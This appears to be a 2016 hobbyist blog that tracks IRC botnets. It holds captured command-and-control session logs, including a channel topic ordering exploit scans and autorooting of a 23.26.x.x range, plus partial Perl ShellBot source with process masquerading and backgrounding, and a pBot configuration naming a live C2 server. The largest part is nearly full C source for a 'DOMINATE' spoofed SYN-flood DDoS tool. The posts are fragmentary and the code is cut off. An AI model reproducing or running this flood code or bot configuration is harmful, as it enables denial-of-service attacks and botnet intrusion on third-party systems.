Pages

Monday, November 28, 2016

ragebot - scan1.zapto.org - t0nixx [SKID]


>> NICK raGe|cjxtdsvUOE
>> USER mnquru "fo1.net" "rage" :mnquru
<< NOTICE AUTH :*** eh...
<< 001 raGe|cjxtdsvUOE
<< 002 raGe|cjxtdsvUOE
<< 003 raGe|cjxtdsvUOE
<< 004 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 005 raGe|cjxtdsvUOE
<< 422 raGe|cjxtdsvUOE :MOTD File is missing
<< MODE raGe|cjxtdsvUOE :+iwG
<< JOIN :#!b!#
>> JOIN #vnc #vnc
<< JOIN :#vnc
<< 332 raGe|cjxtdsvUOE #vnc :.xpl 94 1 23.26.x.x 3 1 23.26.x.x 3 1 / .scan 94 1 23.26.x.x 3 1 23.26.255.255 3 1
<< 333 raGe|cjxtdsvUOE #vnc akanz 1480289648
>> PRIVMSG #vnc :\x0314,1.:[\x0315,1rAGEBoT\x0314,1]:.\x0315,1 range: 23.26.x.x with 94 threads. (autorooting)
>> PING :NhG.server
>> PONG NhG.server
>> JOIN #vnc #vnc

Saturday, November 19, 2016

5k - Perl/ShellBot.B ddos - IRC









# TeaMrx Perlbot vS xeQT


my @mast3rs = ("Low","Loww");


my @admchan=("#Perli");

$servidor='188.119.151.131' unless $servidor;  // his server 


my $xeqt = "!x";
my $homedir = "/tmp";
my $shellaccess = 1;
my $xstats = 1;
my $pacotes = 1;
my $linas_max = 5;
my $sleep = 6;
my $portime = 4;

my @fakeps = ("/usr/local/apache/bin/httpd -DSSL",
    "/usr/sbin/httpd -k start -DSSL",
    "/usr/sbin/httpd",
    "spamd child",
    "httpd");

my @nickname = ("TeaMrx","......","xQt");

my @xident = ("noway",......yn","ju");

my @xname = ("Googurl (C) 2006 xeQt","........","Team Work","jet lie");

#################
# Random Ports
#################
my @rports = ("6667");

my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001",
    "\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001",
    "\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001",
    "\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001",
    "\001Snak for Macintosh 4.9.8 English\001",
    "\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001",
    "\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001",
    "\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001",
    "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001",
    "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001",
    "\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001",
    "\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001",
    "\001ircN 8.00  -  he tries to tell me what I put inside of me  - \001",
    "\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001",
    "\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001",
    "\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001",
    "\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001",
    "\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001",
    "\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001",
    "\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1á9] : Keep it to yourself!\001",
    "\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001",
    "\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001",
    "\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10 - running on FreeBSD i386\001",
    "\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there\001",
    "\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there\001");

# Default quick scan ports
my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");

# xeQt

#my $nick = "sshb0t1";
my $nick = $nickname[rand scalar @nickname];
my $realname = $xname[rand scalar @xname];
my $ircname = $xident[rand scalar @xident];
my $porta = $rports[rand scalar @rports];
my $xproc = $fakeps[rand scalar @fakeps];
my $Mrx = $Mrx[rand scalar @Mrx];
my $version = 'vSm0d (C) TeaMrx';

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

use IO::Socket;
use Socket;
use IO::Select;
chdir("$homedir");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$xproc"."\0";
my $pid=fork;
exit if $pid;
die "[x] -> Cannot fork into background: $!" unless defined($pid);
my %irc_servers;
my %DCC;
my $dcc_sel = new IO::Select->new();

sub getnick {
  return "$nickname[rand scalar @nickname]".int(rand(1000));
}

neeedd to delete some shit coz site gets blacklisted

  }

ahh found this in his spreaading ftp maybe interesting to someone ....


/* "DOMINATE" Attack Script, this script was so difficult to make, it required taking the very public ESSYN
attack script, and replacing "tcph->res2 = 1;" to "tcph->res2 = 3;" in the "setup_tcp_header" function.
Anybody who purchased this script for $300 BTC, yup, it's literally changing a 1 to a 3.
*/
#include unistd.h
#include time.h
#include sys/types.h
#include sys/socket.h
#include sys/ioctl.h
#include string.h
#include stdlib.h
#include stdio.h
#include pthread.h
#include netinet/tcp.h
#include netinet/ip.h
#include netinet/in.h
#include netinet/if_ether.h
#include netdb.h
#include net/if.h
#include arpa/inet.h

#define MAX_PACKET_SIZE 4096
#define PHI 0x9e3779b9

static unsigned long int Q[4096], c = 362436;
static unsigned int floodport;
volatile int limiter;
volatile unsigned int pps;
volatile unsigned int sleeptime = 100;

void init_rand(unsigned long int x)
{
 int i;
 Q[0] = x;
 Q[1] = x + PHI;
 Q[2] = x + PHI + PHI;
 for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
}
unsigned long int rand_cmwc(void)
{
 unsigned long long int t, a = 18782LL;
 static unsigned long int i = 4095;
 unsigned long int x, r = 0xfffffffe;
 i = (i + 1) & 4095;
 t = a * Q[i] + c;
 c = (t >> 32);
 x = t + c;
 if (x < c) {
  x++;
  c++;
 }
 return (Q[i] = r - x);
}
unsigned short csum (unsigned short *buf, int count)
{
 register unsigned long sum = 0;
 while( count > 1 ) { sum += *buf++; count -= 2; }
 if(count > 0) { sum += *(unsigned char *)buf; }
 while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
 return (unsigned short)(~sum);
}

unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {

 struct tcp_pseudo
 {
  unsigned long src_addr;
  unsigned long dst_addr;
  unsigned char zero;
  unsigned char proto;
  unsigned short length;
 } pseudohead;
 unsigned short total_len = iph->tot_len;
 pseudohead.src_addr=iph->saddr;
 pseudohead.dst_addr=iph->daddr;
 pseudohead.zero=0;
 pseudohead.proto=IPPROTO_TCP;
 pseudohead.length=htons(sizeof(struct tcphdr));
 int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
 unsigned short *tcp = malloc(totaltcp_len);
 memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
 memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
 unsigned short output = csum(tcp,totaltcp_len);
 free(tcp);
 return output;
}

void setup_ip_header(struct iphdr *iph)
{
 iph->ihl = 5;
 iph->version = 4;
 iph->tos = 0;
 iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
 iph->id = htonl(54321);
 iph->frag_off = 0;
 iph->ttl = MAXTTL;
 iph->protocol = 6;
 iph->check = 0;
 iph->saddr = inet_addr("192.168.3.100");
}

void setup_tcp_header(struct tcphdr *tcph)
{
 tcph->source = htons(5678);
 tcph->seq = rand();
 tcph->ack_seq = 0;
 tcph->res2 = 3;
 tcph->doff = 5;
 tcph->syn = 1;
 tcph->window = htonl(65535);
 tcph->check = 0;
 tcph->urg_ptr = 0;
}

void *flood(void *par1)
{
 char *td = (char *)par1;
 char datagram[MAX_PACKET_SIZE];
 struct iphdr *iph = (struct iphdr *)datagram;
 struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
 
 struct sockaddr_in sin;
 sin.sin_family = AF_INET;
 sin.sin_port = htons(floodport);
 sin.sin_addr.s_addr = inet_addr(td);

 int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
 if(s < 0){
  fprintf(stderr, "Could not open raw socket.\n");
  exit(-1);
 }
 memset(datagram, 0, MAX_PACKET_SIZE);
 setup_ip_header(iph);
 setup_tcp_header(tcph);

 tcph->dest = htons(floodport);

 iph->daddr = sin.sin_addr.s_addr;
 iph->check = csum ((unsigned short *) datagram, iph->tot_len);

 int tmp = 1;
 const int *val = &tmp;
 if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
  fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
  exit(-1);
 }

 init_rand(time(NULL));
 register unsigned int i;
 i = 0;
 while(1){
  sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));

  iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
  iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
  iph->check = csum ((unsigned short *) datagram, iph->tot_len);
  tcph->seq = rand_cmwc() & 0xFFFF;
  tcph->source = htons(rand_cmwc() & 0xFFFF);
  tcph->check = 0;
  tcph->check = tcpcsum(iph, tcph);
  
  pps++;
  if(i >= limiter)
  {
   i = 0;
   usleep(sleeptime);
  }
  i++;
 }
}
int main(int argc, char *argv[ ])
{
 if(argc < 6){
  fprintf(stderr, "Invalid parameters!\n");
  fprintf(stdout, "Usage: %s     


Sunday, November 13, 2016

pBot Skidd - 93.158.200.94 - IRC




// users 
9/tcp  open  irc     Unreal ircd
| irc-info: 
|   server: irc.MoneyZ.gov.GoV
|   version: Unreal3.2.10.2. irc.MoneyZ.gov.GoV 
|   servers: 1
|   chans: 2
|   users: 246
|   lservers: 0
|   lusers: 246

//confg
class pBot
{
 var $config = array("server"=>"93.158.200.94", "port"=>"9", "key"=>"", "prefix"=>"botID", "maxrand"=>"8", "chan"=>"#-|Bots", "trigger"=>"", "password"=>"", "auth"=>"MoneyZ.gov");
 var $users = array();
 function start() {
    while(true)
 {

Saturday, November 12, 2016

Bot - l.lolole.net - IRC

DNS : l.lolole.net


<< NOTICE AUTH :*** Looking up your hostname...
<< NOTICE AUTH :*** Found your hostname
>> USER dk dk dk dk
>> NICK dkacoxfdb
<< 001 dkacoxfdb
<< 002 dkacoxfdb :               M0dded by uNkn0wn Crew
<< 003 dkacoxfdb
<< 004 dkacoxfdb :          www.uNkn0wn.eu - iD@uNkn0wn.eu
<< 005 dkacoxfdb
<< 005 dkacoxfdb
<< 005 dkacoxfdb
<< 422 dkacoxfdb :MOTD File is missing
<< MODE dkacoxfdb :+iwG
>> JOIN #k
<< JOIN :#k
>> PING :E.tk
>> PONG :E.tk



testhttps://malwr.com/analysis/YThlNzM5N2JlNjU1NGIwNjg0ZWY3Y2YwYzgwNTcxYWI/share/e34eba54ecbb465a9c40c221949ac034